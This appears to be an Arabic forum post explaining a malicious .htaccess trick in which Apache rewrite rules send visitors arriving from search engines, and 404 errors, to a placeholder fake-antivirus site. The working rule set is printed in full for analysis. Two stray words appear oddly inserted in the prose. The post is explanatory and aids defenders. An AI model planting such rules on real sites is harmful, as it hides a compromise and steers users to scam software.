قام الأشخاص السيئون (crackers) باستغلال RewriteEngine في apache بطريقة سيئة لتحويل الزوار إلى مواقع مزورة لمنتج pluginي برامج مكافحة الفيروس. خاصية RewriteEngine يمكن تفعيلها من خلال ملف htaccess لاحظ المثال التالي:



رمز PHP:
<code style="white-space:nowrap"> <code> RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ &#91;NC,OR&#93;
RewriteCond %{HTTP_REFERER} .*aol.*$ &#91;NC,OR&#93;
RewriteCond %{HTTP_REFERER} .*msn.*$ &#91;NC,OR&#93;
RewriteCond %{HTTP_REFERER} .*altavista.*$ &#91;NC,OR&#93;



RewriteCond %{HTTP_REFERER} .*ask.*$ &#91;NC,OR&#93;
RewriteCond %{HTTP_REFERER} .*yahoo.*$ &#91;NC&#93;
RewriteRule .* http://BAD_SITE/in.html?s=hg &#91;R,L&#93;
Errordocument 404 http://BAD_SITE/in.html?s=hg_err
</code> </code>

RewriteEngine On
سوف تفعل الخاصية

الجمل الست التي تليها هي شروط إعادة كتابة العنوان.

هذه الجمل تفحص ال HTTP_REFERER وكما هو ظاهر فهي تتضمن بعض أشهر محركات البحث. عند تحقق أي شرط من هذه الشروط سيتم تنفيذ جملة joomla RewriteRule.

كما هو ظاهر من الصيغة أعلاه فهي طريقة خبيثة للغاية حيث أن المستخدم عند زيارته للموقع من خلال عنوان الموقع المباشر فلا شيء سوف يحدث لكن حين زيارته من خلال موقع بحث من المواقع المذكورة في الشروط فسوف يتم تحويل المستخدم إلى الموقع المزور.





©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى©